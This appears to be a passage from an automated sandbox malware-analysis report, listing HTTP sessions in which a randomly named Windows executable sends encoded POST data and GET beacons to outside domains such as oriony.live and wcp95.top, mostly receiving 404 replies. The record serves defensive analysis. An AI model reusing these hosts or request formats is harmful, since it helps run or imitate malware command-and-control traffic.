                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1490
                                                                                                x-request-id: 8f8a61e4-51b2-4f70-8735-ddad8e718586
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FXHELMCSvHfvZQ3fdxfXMjkxnlVuXcTL5OPTt/qm0O8RYNA9u7PK9d0xDL6/WOOqcqXaX6SGwQ4cDMI0FbTepg==
                                                                                                set-cookie: parking_session=8f8a61e4-51b2-4f70-8735-ddad8e718586; expires=Mon, 11 Nov 2024 16:17:05 GMT; path=/
                                                                                                connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 58 48 45 4c 4d 43 53 76 48 66 76 5a 51 33 66 64 78 66 58 4d 6a 6b 78 6e 6c 56 75 58 63 54 4c 35 4f 50 54 74 2f 71 6d 30 4f 38 52 59 4e 41 39 75 37 50 4b 39 64 30 78 44 4c 36 2f 57 4f 4f 71 63 71 58 61 58 36 53 47 77 51 34 63 44 4d 49 30 46 62 54 65 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FXHELMCSvHfvZQ3fdxfXMjkxnlVuXcTL5OPTt/qm0O8RYNA9u7PK9d0xDL6/WOOqcqXaX6SGwQ4cDMI0FbTepg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                Nov 11, 2024 17:02:05.773549080 CET890INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGY4YTYxZTQtNTFiMi00ZjcwLTg3MzUtZGRhZDhlNzE4NTg2IiwicGFnZV90aW1lIjoxNzMxMzQwOTI1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.11.2049763192.64.118.221807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:11.256803989 CET753OUTPOST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4f 35 61 73 4b 64 31 74 4c 77 63 78 73 36 77 34 4b 4b 46 55 63 77 76 34 38 7a 50 75 61 34 4f 74 63 52 77 34 49 4f 72 46 68 74 69 2b 51 4a 36 53 35 66 41 6c 31 59 48 35 50 30 31 39 76 72 68 62 36 4d 77 78 47 72 7a 6c 48 56 6c 53 72 4b 6a 71 63 51 44 78 33 57 57 41 46 2b 52 78 58 6c 47 2f 65 52 48 62 6c 54 32 36 64 53 4b 62 32 31 65 36 41 37 64 5a 39 32 2f 73 63 4d 4f 47 6b 6a 41 4b 2b 65 33 44 62 5a 5a 70 49 44 47 4a 75 58 69 77 70 63 6b 4b 73 45 2f 47 38 4c 57 30 61 48 78 4c 78 74 33 66 57 6b 65 6d 42 44 62 6d 63 4b 70 43 4d 4c 77 58 62 63 2f 42 38 46 4e 56 59 4a 4b 39 38 67 3d 3d
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxs6w4KKFUcwv48zPua4OtcRw4IOrFhti+QJ6S5fAl1YH5P019vrhb6MwxGrzlHVlSrKjqcQDx3WWAF+RxXlG/eRHblT26dSKb21e6A7dZ92/scMOGkjAK+e3DbZZpIDGJuXiwpckKsE/G8LW0aHxLxt3fWkemBDbmcKpCMLwXbc/B8FNVYJK98g==
                                                                                                Nov 11, 2024 17:02:11.561925888 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:02:11 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                18192.168.11.2049764192.64.118.221807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:14.079031944 CET773OUTPOST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4f 35 61 73 4b 64 31 74 4c 77 63 78 74 62 67 34 49 70 74 55 55 77 76 37 67 44 50 75 54 59 4f 78 63 52 73 34 49 4c 4c 56 67 65 47 2b 51 6f 71 53 34 61 73 6c 35 34 48 35 63 30 31 34 77 62 68 71 36 4d 30 58 47 72 50 6c 48 56 42 53 72 4f 6e 71 63 6a 62 32 32 47 57 43 63 75 52 7a 55 56 47 2f 65 52 48 62 6c 54 53 63 64 54 69 62 32 41 4f 36 42 61 64 61 68 6d 2f 72 4b 38 4f 47 31 54 41 4f 2b 65 32 57 62 59 46 50 49 42 4f 4a 75 53 47 77 6e 74 6b 4e 6e 45 2f 41 7a 72 58 64 65 43 73 6e 35 2f 43 6f 62 46 71 54 45 68 62 62 64 63 6b 59 52 35 45 7a 59 50 6a 7a 34 31 30 39 61 4c 4c 6d 68 6f 49 4e 70 55 54 7a 55 51 73 47 46 2f 59 52 43 2f 75 61 74 69 38 3d
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxtbg4IptUUwv7gDPuTYOxcRs4ILLVgeG+QoqS4asl54H5c014wbhq6M0XGrPlHVBSrOnqcjb22GWCcuRzUVG/eRHblTScdTib2AO6Badahm/rK8OG1TAO+e2WbYFPIBOJuSGwntkNnE/AzrXdeCsn5/CobFqTEhbbdckYR5EzYPjz4109aLLmhoINpUTzUQsGF/YRC/uati8=
                                                                                                Nov 11, 2024 17:02:14.383464098 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:02:14 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.11.2049765192.64.118.221807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:16.907685041 CET2578OUTPOST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4f 35 61 73 4b 64 31 74 4c 77 63 78 74 62 67 34 49 70 74 55 55 77 76 37 67 44 50 75 54 59 4f 78 63 52 73 34 49 4c 4c 56 67 65 4f 2b 51 36 79 53 35 39 34 6c 34 34 48 35 48 55 31 35 77 62 68 4e 36 4d 4d 54 47 72 43 61 48 58 4a 53 74 72 7a 71 61 53 62 32 38 47 57 43 42 2b 52 77 58 6c 47 6d 65 52 58 66 6c 54 69 63 64 54 69 62 32 42 2b 36 48 4c 64 61 6a 6d 2f 73 63 4d 4f 4b 6b 6a 41 6d 2b 65 2b 47 62 59 78 35 4a 78 75 4a 75 79 57 77 71 37 49 4e 34 30 2f 43 36 37 58 46 65 43 6f 34 35 2f 50 52 62 47 32 71 45 6d 50 62 66 4c 31 64 43 4b 30 2f 47 75 2f 57 38 30 49 72 57 70 72 4a 35 6f 34 66 2f 47 7a 45 58 51 35 56 4b 49 30 48 53 76 79 6a 34 56 35 73 68 72 49 72 39 65 6a 2f 35 38 55 4e 77 42 75 44 67 78 59 71 70 6c 44 55 41 74 63 78 74 79 6e 78 32 2f 4d 7a 34 46 30 6c 68 6d 31 33 6d 5a 46 6e 4d 45 6a 50 51 43 5a 4f 66 39 59 64 6a 77 2f 6b 65 77 57 67 34 39 68 2f 37 65 78 54 48 32 33 50 74 64 4e 41 38 49 38 34 37 47 6c 37 2f 70 71 58 4b 6e 68 33 53 75 6a 69 44 6c 31 77 62 49 63 78 79 46 68 30 69 [TRUNCATED]
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxtbg4IptUUwv7gDPuTYOxcRs4ILLVgeO+Q6yS594l44H5HU15wbhN6MMTGrCaHXJStrzqaSb28GWCB+RwXlGmeRXflTicdTib2B+6HLdajm/scMOKkjAm+e+GbYx5JxuJuyWwq7IN40/C67XFeCo45/PRbG2qEmPbfL1dCK0/Gu/W80IrWprJ5o4f/GzEXQ5VKI0HSvyj4V5shrIr9ej/58UNwBuDgxYqplDUAtcxtynx2/Mz4F0lhm13mZFnMEjPQCZOf9Ydjw/kewWg49h/7exTH23PtdNA8I847Gl7/pqXKnh3SujiDl1wbIcxyFh0iFm+CjNk491sIf3TA6RCeuKupf+kq/tT3rKqWxJvci8p/w/RQfxBVrRciFJXOS/lWL1t3CNnOAN46ihy41+J6ORfO7KOq0+BRlwMIn58qYG55lcMVTv3edAm+FlH9QX6+guNUxeqjPDZaDKcQen+q+eDyhCwIBR79bT1UNXUNFFNc/0mGctRJTrO+EDtGAVCtIWSjIqlTu+p8cCw1c6LpFHoeE+nHUtSNkCWgy2owK9HqG0DDY1zveBIgztUF4Nq8aOPGDcg0Ol/MPRJWrqTLiWO36WIPL9p4afJ7bNT8iBv1yEKUyyE0y3sLVN2+z6qoV13ZC5yHmFDLgcSmFQwYbMGKkg01BMYeoM2r4qdSswjjb50Qu+8mG82qQHbW3LTK8wsSxmOSBGE8LeHkk9ktZNxVwlWgF/Qcp8kEHnSHFXxErrD76R6MGfOK+J/hHfNW0RfGUTp91jezxJsxh61pB/X9Co2F/eZdcoDIjbTeKIdhbiMszcqmag9FWBZMbPFOgA/loCYxBzw0/1VSM0Np9Ag9l9OpPnxzOLmuTuILNkq52nccpdW9ksJ/E37QRaX4qgJC0sgLhu+SoVdWF4jdCIz4gcybNk4+pCAks877uMwHv2vlp3qkAWJXbd76vQJqB+g07gaom0yLr14Wi0IPSFcgydsb/MZt6b [TRUNCATED]
                                                                                                Nov 11, 2024 17:02:16.907705069 CET3867OUTData Raw: 2b 38 4b 6f 42 6c 36 79 69 69 62 44 42 6c 41 6a 6d 37 73 31 4f 73 54 42 6b 34 4e 64 4c 6a 47 75 46 66 76 52 6a 44 33 46 62 46 48 75 49 4f 55 72 75 62 64 4d 4c 72 36 71 30 54 36 38 34 67 44 35 6e 52 51 48 63 69 55 62 4c 30 4f 33 51 58 71 59 77 32
                                                                                                Data Ascii: +8KoBl6yiibDBlAjm7s1OsTBk4NdLjGuFfvRjD3FbFHuIOUrubdMLr6q0T684gD5nRQHciUbL0O3QXqYw2cE9FTDAxvFCsJqsI1w5EPFcw47Aa0JlblUm5JUhwmfOBnXOYLaZ6rg5zX4Wo/Hkj7jlx0/JKkz0twbT+8hf+r2inaA1d8H7BwosxszRA12DCTrhhVU4HRxGmGPRfHbcEP5Yg/8eMAWFULL0wDBgRQCMplFpcDu8V4
                                                                                                Nov 11, 2024 17:02:16.907778978 CET1477OUTData Raw: 68 56 67 32 4e 6d 71 74 67 61 53 6d 51 41 44 5a 69 65 43 5a 78 4a 79 42 48 32 56 4e 41 44 4b 6e 50 75 42 31 65 35 46 65 5a 61 75 64 52 43 4c 70 48 67 4e 43 69 59 42 6b 36 64 38 69 4e 31 76 2b 63 79 2b 2f 36 6d 32 55 44 7a 50 54 43 63 31 54 66 32
                                                                                                Data Ascii: hVg2NmqtgaSmQADZieCZxJyBH2VNADKnPuB1e5FeZaudRCLpHgNCiYBk6d8iN1v+cy+/6m2UDzPTCc1Tf2TwgXkMu6VJxMNEQ/wRROTCh/ySKILZK70l2RVhbkJ+pOjyTRMjqBVj02Aq7nD08wIgLRNtvspc9rVX7HOpWVMyBZlDHQk7nT/C4YzJKW7s8TzE2e5dKudtaOJO1DGuZFE1Z4uqSQfKJOjlGByuBEX+077pE1mXF/V
                                                                                                Nov 11, 2024 17:02:17.217278004 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:02:17 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.11.2049766192.64.118.221807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:19.733612061 CET495OUTGET /baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:20.040266037 CET548INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:02:19 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.11.2049767154.23.184.95807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:25.616754055 CET747OUTPOST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 2f 5a 42 31 48 52 33 6d 50 54 71 77 44 75 32 69 6d 50 6f 53 67 37 37 79 61 4a 57 37 5a 6f 31 50 75 62 78 49 33 4c 35 7a 4a 69 44 6a 44 69 61 44 78 4f 35 5a 34 36 64 4f 77 59 68 5a 4a 7a 37 48 33 30 30 62 32 42 2b 6c 2b 61 32 36 6a 69 36 77 64 32 41 61 47 2b 35 38 58 44 61 76 55 53 73 39 56 61 79 36 42 4d 44 30 37 62 46 45 67 72 4e 62 6a 59 75 47 4c 34 35 2b 50 64 74 46 2f 4f 56 70 4e 45 6d 55 7a 4b 41 66 56 4c 44 6f 69 43 71 62 7a 44 47 4e 35 59 65 55 44 44 46 47 37 6f 46 34 71 37 68 55 77 64 6b 69 4d 6f 67 47 4a 64 74 47 70 4e 58 54 2f 72 45 63 52 53 6f 6b 43 53 35 64 51 3d 3d
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqwDu2imPoSg77yaJW7Zo1PubxI3L5zJiDjDiaDxO5Z46dOwYhZJz7H300b2B+l+a26ji6wd2AaG+58XDavUSs9Vay6BMD07bFEgrNbjYuGL45+PdtF/OVpNEmUzKAfVLDoiCqbzDGN5YeUDDFG7oF4q7hUwdkiMogGJdtGpNXT/rEcRSokCS5dQ==
                                                                                                Nov 11, 2024 17:02:25.956283092 CET312INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:02:25 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.11.2049768154.23.184.95807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
